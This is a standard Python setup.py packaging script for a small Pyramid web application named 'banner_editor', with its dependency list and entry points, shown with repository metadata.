5dc267bb5342d1795d7c410c5e98655be265ee2b
|
refs/heads/master
| 2022-11-28T06:11:25.958049
| 2019-06-06T23:57:21
| 2019-06-06T23:57:21
| 174,526,554
| 0
| 0
| null | 2022-11-22T03:28:52
| 2019-03-08T11:33:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,225
|
py
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.txt')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.txt')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_debugtoolbar',
'pyramid_mako',
'pyramid_tm',
'SQLAlchemy',
'transaction',
'zope.sqlalchemy',
'waitress',
]
setup(
name='banner_editor',
version='0.0',
description='banner_editor',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='Maksim N.',
author_email='maksimn@ronis.mail',
url='',
keywords='web wsgi bfg pylons pyramid',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='banner_editor',
install_requires=requires,
entry_points="""\
[paste.app_factory]
main = banner_editor:main
[console_scripts]
initialize_banner_editor_db = banner_editor.scripts.initializedb:main
""",
)
|
[
"javamexx@rambler.ru"
] |
javamexx@rambler.ru
|